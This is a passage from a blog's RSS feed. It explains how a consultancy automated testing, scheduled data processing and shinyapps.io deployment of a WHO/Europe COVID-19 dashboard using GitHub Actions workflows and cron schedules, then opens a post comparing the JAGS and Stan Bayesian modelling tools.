After all, if the new code has a mistake, it&amp;rsquo;s good for your tests to find the error before you
go on to build even more code on top of it.
So every time changes are pushed to a pull request or the main branch of our git repository,
a workflow runs to perform all tests.&lt;/p&gt;
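&lt;p&gt;A workflow of that kind might look roughly like the sketch below. It assumes that the tests live in &lt;code&gt;tests/testthat&lt;/code&gt;, that {testthat} is recorded in the renv lockfile, and that the default branch is called &lt;code&gt;main&lt;/code&gt;; the file and job names are placeholders.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;# .github/workflows/run-tests.yaml (hypothetical file name)
name: run-tests

# Run on pushes to the main branch and on every update to a pull request
on:
  push:
    branches: [main]
  pull_request:

jobs:
  run-tests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - uses: r-lib/actions/setup-r@v2
        with:
          use-public-rspm: true

      # Restore the packages listed in the renv lockfile (assumed to include testthat)
      - uses: r-lib/actions/setup-renv@v2

      # Assumed test location; a failing test stops R with an error, which fails the job
      - name: Run tests
        run: testthat::test_dir(&amp;#34;tests/testthat&amp;#34;, stop_on_failure = TRUE)
        shell: Rscript {0}
&lt;/code&gt;&lt;/pre&gt;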
&lt;!-- Tests can be created and run using the {testthat} package --&gt;
&lt;h3 id="deployments"&gt;Deployments&lt;/h3&gt;
&lt;p&gt;The WHO/Europe COVID-19 Vaccine Programme Monitor is hosted on &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt;.
Originally, when changes were made to the application, someone would have to manually perform the
process of publishing the latest version of the application online.
Not only is it needlessly inefficient to have a developer spend time performing this
operation, but it also allows human error to creep in: what if you&amp;rsquo;re logged into
the wrong account, or you overwrite the wrong application, or perhaps you just patched a critical
bug in your code repository but forget to publish the fixed app altogether? In this scenario, it&amp;rsquo;s better to have a
pipeline watching over us, ready to step in at the right moment.&lt;/p&gt;
&lt;p&gt;A nice feature of &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt; is that multiple apps can be hosted from a single account.
We took advantage of this by creating automated workflows that deploy the latest versions of the
apps to shinyapps.io every time changes are pushed to the default branch, giving users the
newest version of the app at all times.&lt;/p&gt;
&lt;p&gt;But to make life easier for ourselves, we also publish versions of the app for every proposed change
that we create.
Not only does this ensure the app should deploy correctly, but it provides a working version of the
application that members of the WHO can view, allowing them to request changes or provide approval
before all changes are confirmed.
When those changes are incorporated into the main versions of the app, our automated workflows
delete these development apps and publish the public version.&lt;/p&gt;
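&lt;p&gt;One way to sketch the per-change deployment is a workflow triggered by pull requests that derives the app name from the pull request number. This is an illustration under stated assumptions, not the workflow used for the WHO/Europe app: the &lt;code&gt;my-app-pr-&lt;/code&gt; naming scheme and the file and job names are hypothetical, and the three &lt;code&gt;SHINYAPPS_*&lt;/code&gt; values are assumed to be stored as repository secrets.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;# .github/workflows/shiny-deploy-preview.yaml (hypothetical file name)
name: shiny-deploy-preview

on:
  pull_request:

jobs:
  deploy-preview:
    runs-on: ubuntu-latest
    env:
      GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }}
      # Hypothetical naming scheme: one preview app per pull request
      APPNAME: my-app-pr-${{ github.event.pull_request.number }}
    steps:
      - uses: actions/checkout@v3

      - uses: r-lib/actions/setup-r@v2
        with:
          use-public-rspm: true

      - uses: r-lib/actions/setup-renv@v2

      - name: Install rsconnect
        run: install.packages(&amp;#34;rsconnect&amp;#34;)
        shell: Rscript {0}

      # Secret names are assumptions; forceUpdate lets later pushes overwrite the preview
      - name: Deploy preview app
        run: |
          rsconnect::setAccountInfo(&amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
                                    &amp;#34;${{ secrets.SHINYAPPS_TOKEN }}&amp;#34;,
                                    &amp;#34;${{ secrets.SHINYAPPS_SECRET }}&amp;#34;)
          rsconnect::deployApp(appName = &amp;#34;${{ env.APPNAME }}&amp;#34;,
                               account = &amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
                               server = &amp;#34;shinyapps.io&amp;#34;,
                               forceUpdate = TRUE)
        shell: Rscript {0}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Removing the preview app once the change has been merged is not shown here.&lt;/p&gt;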
&lt;h3 id="data-processing"&gt;Data processing&lt;/h3&gt;
&lt;p&gt;Our previous blog post &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;on the data processing&lt;/a&gt;
mentioned how a GitHub Actions workflow now handles data processing
outside of the app on a daily schedule.
We don&amp;rsquo;t actually need to push code to GitHub to prompt that a workflow should run;
a workflow can be scheduled to start at particular times or at regular intervals.
It&amp;rsquo;s defined in a GitHub Actions workflow using a cron schedule expression&amp;mdash;
a sequence of 5 values that denote the minutes, hours, day of month, month, and day of week when a
job should occur, specified according to UTC.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s suppose we want to run a job at 09:30 BST (that&amp;rsquo;s UTC+01), on every weekday (Monday to Friday).
We would specify this as:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-cron" data-lang="cron"&gt;30 8 * * 1-5
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Let&amp;rsquo;s break that down:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;30 8&lt;/code&gt; at the start represents the minutes and hours, so the scheduled time is 08:30 UTC. If you&amp;rsquo;re
working in a BST timezone, that&amp;rsquo;ll translate to 09:30.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;* *&lt;/code&gt; means every day of the month and every month of the year, respectively.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1-5&lt;/code&gt; represents the day of the week, where 0 is Sunday, 1 is Monday and 6 is Saturday. So this represents every
day from Monday to Friday.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;a href="https://crontab.guru/" target="_blank"&gt;Crontab.guru&lt;/a&gt; website is useful for testing the meaning of a cron expression,
or for checking you have constructed your own cron expression correctly.&lt;/p&gt;
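&lt;p&gt;In a workflow file, a schedule like this sits under the &lt;code&gt;on&lt;/code&gt; key. A minimal fragment, showing only the trigger and leaving out the jobs, could look like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;on:
  schedule:
    # 08:30 UTC (09:30 BST), Monday to Friday.
    # The expression is quoted because * is a special character in YAML.
    - cron: &amp;#39;30 8 * * 1-5&amp;#39;
&lt;/code&gt;&lt;/pre&gt;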
&lt;p&gt;GitHub Actions allows for multiple cron times to be specified, and it will run when &lt;em&gt;any&lt;/em&gt; of the
listed times are reached.
And that&amp;rsquo;s a good thing, because the keen-eyed among you will have noticed the issue with the cron specification above: daylight saving time.&lt;/p&gt;
&lt;p&gt;Suppose we actually want to run it every weekday at 09:30 Europe/London time, which is a mixture of BST (UTC+01) between the last Sundays in March and October, and GMT (UTC+00). We can specify several cron expressions to cover different times across the year.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-cron" data-lang="cron"&gt;30 9 * 11-12,1-3 1-5 # 09:30 hours GMT from 1 Nov to 31 Mar.
30 8 25-31 3 1-5 # 09:30 hours BST from 25 Mar - 1 Apr.
30 8 * 4-10 1-5 # 09:30 hours BST from 1 Apr - 31 Oct.
30 9 25-31 10 1-5 # 09:30 hours GMT from 25 Oct - 1 Nov.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This strategy still isn&amp;rsquo;t perfect: for the last weeks in March and October, we essentially run the automated workflow twice, an hour apart, because the date on which the clocks change varies from year to year.&lt;/p&gt;
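&lt;p&gt;Written as a workflow trigger, the four expressions above become a list of &lt;code&gt;cron&lt;/code&gt; entries under &lt;code&gt;schedule&lt;/code&gt;. The fragment below is a sketch that simply carries those expressions over; the jobs are left out.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;on:
  schedule:
    # The workflow starts whenever any one of these entries matches (times are UTC)
    - cron: &amp;#39;30 9 * 11-12,1-3 1-5&amp;#39;  # 09:30 GMT, November to March
    - cron: &amp;#39;30 8 25-31 3 1-5&amp;#39;      # 09:30 BST, end of March
    - cron: &amp;#39;30 8 * 4-10 1-5&amp;#39;       # 09:30 BST, April to October
    - cron: &amp;#39;30 9 25-31 10 1-5&amp;#39;     # 09:30 GMT, end of October
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One caveat worth checking before relying on this: in POSIX cron, when both the day-of-month and day-of-week fields are restricted, a day that matches either field triggers the job. The two end-of-month entries may therefore fire more often than their comments suggest, so it is sensible to confirm the behaviour on Crontab.guru and in the workflow run history.&lt;/p&gt;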
&lt;p&gt;To further complicate matters, despite our best efforts to ensure the job runs at 09:30 local time, when you&amp;rsquo;re using the shared resources of GitHub Actions, your job may have to wait in a queue for several minutes, or even hours, if it&amp;rsquo;s a particularly busy time for their servers. Got a mission-critical workflow that &lt;em&gt;must&lt;/em&gt; run exactly on time? Then have the job performed by your own dedicated CI/CD runners.&lt;/p&gt;
&lt;h2 id="how-do-i-set-up-a-workflow"&gt;How do I set up a workflow?&lt;/h2&gt;
&lt;p&gt;The method used will depend on what CI/CD runner you&amp;rsquo;ll be using. We&amp;rsquo;ll discuss a very basic workflow for an R user who has a Shiny app they want to automatically deploy to shinyapps.io using GitHub Actions.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re going to start by creating a new Shiny app in RStudio, which will come initialised with a git repository and will use {renv}. The renv lockfile will already come supplied with the necessary packages needed to run the default &amp;ldquo;Old Faithful Geyser&amp;rdquo; app.
We&amp;rsquo;ll also make sure we&amp;rsquo;ve pushed the app&amp;rsquo;s repository to GitHub.&lt;/p&gt;
&lt;p&gt;Next we&amp;rsquo;ll need to generate an access token from shinyapps.io, which will allow GitHub Actions to access our account for the purpose of uploading Shiny apps.&lt;/p&gt;
&lt;p&gt;Having logged into &lt;a href="https://www.shinyapps.io/" target="_blank"&gt;shinyapps.io&lt;/a&gt;, go to the &lt;em&gt;Account&lt;/em&gt; → &lt;em&gt;Tokens&lt;/em&gt; section of the menu. Click the button to &amp;ldquo;Add token&amp;rdquo;, and make a note of the &lt;em&gt;Token&lt;/em&gt; and &lt;em&gt;Secret&lt;/em&gt; values. For security reasons, the &lt;em&gt;Secret&lt;/em&gt; will be hidden until you reveal it.&lt;/p&gt;
&lt;p&gt;Now in GitHub, go to the repository&amp;rsquo;s settings and navigate to the &lt;em&gt;Secrets&lt;/em&gt; → &lt;em&gt;Actions&lt;/em&gt; menu. Create a new repository secret for each of the account name, token and secret values taken from shinyapps.io.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Create a new secret for GitHub Actions by entering a name and the account name, token or secret values. Then click the “Add secret” button to save the value." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/new_github_actions_secret.png" width="707"&gt;&lt;/p&gt;
&lt;p&gt;When you&amp;rsquo;re done, you should have three secrets which you&amp;rsquo;ve named for use in GitHub Actions:&lt;/p&gt;
&lt;p&gt;&lt;img alt="GitHub will list the secrets that have been made. Here we have created three secrets for GitHub Actions, named “SHINYAPPS_NAME”, “SHINYAPPS_TOKEN”, and “SHINYAPPS_SECRET”." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/github_actions_secrets.png" width="707"&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll use an &lt;a href="https://github.com/r-lib/actions/blob/v2-branch/examples/shiny-deploy.yaml" target="_blank"&gt;example template from r-lib actions&lt;/a&gt;, which provides a ready-made GitHub Actions workflow. This will perform a number of steps: creating an Ubuntu instance; pulling the latest version of your code from the main branch on GitHub; installing and preparing R; installing package dependencies from the renv lockfile; and then performing the necessary steps to deploy the application to shinyapps.io.
We just need to edit a few lines specifying the &lt;code&gt;APPNAME&lt;/code&gt; and &lt;code&gt;SERVER&lt;/code&gt;, and store it in a new directory (in the GitHub repository&amp;rsquo;s root directory) of &lt;code&gt;.github/workflows/&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# .github/workflows/shiny-deploy.yaml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;on&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;push&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;branches&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;main, master]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;shiny-deploy&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;jobs&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shiny-deploy&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;runs-on&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;ubuntu-latest&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;env&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;GITHUB_PAT&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${{ secrets.GITHUB_TOKEN }}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;steps&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;actions/checkout@v3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-pandoc@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-r@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;with&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;use-public-rspm&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;uses&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;r-lib/actions/setup-renv@v2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Install rsconnect&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;run&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;install.packages(&amp;#34;rsconnect&amp;#34;)&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shell&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Rscript {0}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;name&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Authorize and deploy app&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;env&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Provide your app name and deployment server below&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;APPNAME&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;github-deployed-app&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;SERVER&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;shinyapps.io&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;run&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;|&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; rsconnect::setAccountInfo(&amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;${{ secrets.SHINYAPPS_TOKEN }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#34;${{ secrets.SHINYAPPS_SECRET }}&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; rsconnect::deployApp(appName = &amp;#34;${{ env.APPNAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; account = &amp;#34;${{ secrets.SHINYAPPS_NAME }}&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; server = &amp;#34;${{ env.SERVER }}&amp;#34;)&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;shell&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;Rscript {0}&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we commit the new file and push the change to the default branch, GitHub will automatically run the workflow on their servers for us.
We can see progress on the &amp;ldquo;Actions&amp;rdquo; page of the repository, where it will display whether a pipeline is currently running, or has finished with a &lt;i class="fa fa-check-circle-o" style="color:#2da160;"&gt;&lt;/i&gt; pass or &lt;i class="fa fa-times-circle-o" style="color:#ec5941;"&gt;&lt;/i&gt; fail status.
Details for a failing pipeline can be viewed by clicking on the failed pipeline and viewing the output generated during that workflow.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The “Actions” page of the GitHub repository lists the workflows that are currently running, as well as records from previous workflows. A tick signifies the workflow has succeeded, while a cross indicated the workflow has failed." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/images/list_of_github_actions.png" width="1368"&gt;&lt;/p&gt;
&lt;p&gt;When the pipeline has succeeded, we can view the newly deployed app on shinyapps.io.
The app&amp;rsquo;s deployment address will be of the format https://[USERNAME].shinyapps.io/[APPNAME], where [USERNAME] and [APPNAME] are replaced with the values used in the deployment .yaml file.&lt;/p&gt;
&lt;h2 id="whats-the-net-result"&gt;What&amp;rsquo;s the net result?&lt;/h2&gt;
&lt;p&gt;Creating the automated processes and workflows to manage the &lt;a href="https://worldhealthorg.shinyapps.io/EURO_COVID-19_vaccine_monitor/" target="_blank"&gt;WHO/Europe COVID-19 Vaccine Programme Monitor&lt;/a&gt; for WHO/Europe required an investment of time and money. But those short-term costs have generated long-term savings in the maintenance effort and time required to manage their data processing and host the dashboard.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s important to note that not everything is done automatically for us. As is the way with real-world data, there are always going to be a few data quality anomalies that mean members of WHO/Europe will prepare a small amount of the data themselves as part of the overall workflow. This is not necessarily a bad thing; there are many instances where &lt;a href="https://youtu.be/sseSi0k3Ecg?t=232" target="_blank"&gt;fully automated systems have produced ludicrous results when left to operate unsupervised&lt;/a&gt;, so maintaining a human touch can help keep things in check.
But with 95% of the work being handled automatically, members from both WHO/Europe and Jumping Rivers are free to focus on other more important matters.&lt;/p&gt;
&lt;p&gt;For the last few months, the app has mostly looked after itself in a reliable way. And for an automated process, there can be no higher praise.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-github-actions/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I learn Stan?</title><link>https://www.jumpingrivers.com/blog/why-stan/</link><pubDate>Thu, 09 Feb 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-stan/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-stan/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-stan/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="a-little-bit-about-you"&gt;A little bit about you&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s assume you&amp;rsquo;re familiar with Bayesian statistics; you know what I mean when I say prior, likelihood and posterior. Recall that an MCMC scheme constructs a Markov chain as a method to sample from the posterior density.&lt;/p&gt;
&lt;p&gt;You may have used a probabilistic programming language (PPL) in the past, such as &lt;a href="https://www.mrc-bsu.cam.ac.uk/software/bugs/" rel="external"&gt;BUGS&lt;/a&gt;, to perform Bayesian inference. You&amp;rsquo;ve heard about &lt;a href="https://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; and want to learn a little more. Or maybe you&amp;rsquo;re about to step into the Bayesian paradigm and don&amp;rsquo;t know where to start. You want to know whether you should make the switch from JAGS to Stan, &lt;em&gt;or&lt;/em&gt; you&amp;rsquo;ve used neither &lt;a href="https://mcmc-jags.sourceforge.io/" rel="external"&gt;JAGS&lt;/a&gt; nor Stan and want to know which will suit you best. This post will focus solely on the differences between JAGS and Stan as I have experience with both of them, but there are many more PPLs out there. For example, I have never used &lt;a href="https://beanmachine.org/" rel="external"&gt;&lt;em&gt;Bean Machine&lt;/em&gt;&lt;/a&gt;, but of all the PPLs, it certainly takes the crown for best name.&lt;/p&gt;
&lt;p&gt;Although Stan is a PPL, JAGS technically &lt;em&gt;isn&amp;rsquo;t&lt;/em&gt; a programming language (more on this later). We will use the term &amp;ldquo;Bayesian modelling software&amp;rdquo; to talk about them both.&lt;/p&gt;
&lt;h3 id="why-use-bayesian-modelling-software"&gt;Why use Bayesian modelling software?&lt;/h3&gt;
&lt;p&gt;When we do a (fully) Bayesian analysis we essentially have two ways to estimate the model parameters. If you have too much spare time on your hands, option A: &lt;em&gt;write a bespoke sampling scheme&lt;/em&gt; might appeal to you. If you have other things to do, and want your inferences to be reliable, then I&amp;rsquo;d recommend option B: &lt;em&gt;construct your model with purpose built software&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The advantages of using Bayesian modelling software over hand-coding a bespoke sampler are similar to the advantages of using a package or library over hand-coding any other model. There&amp;rsquo;s no need to reinvent the wheel when somebody else has done all the hard work.&lt;/p&gt;
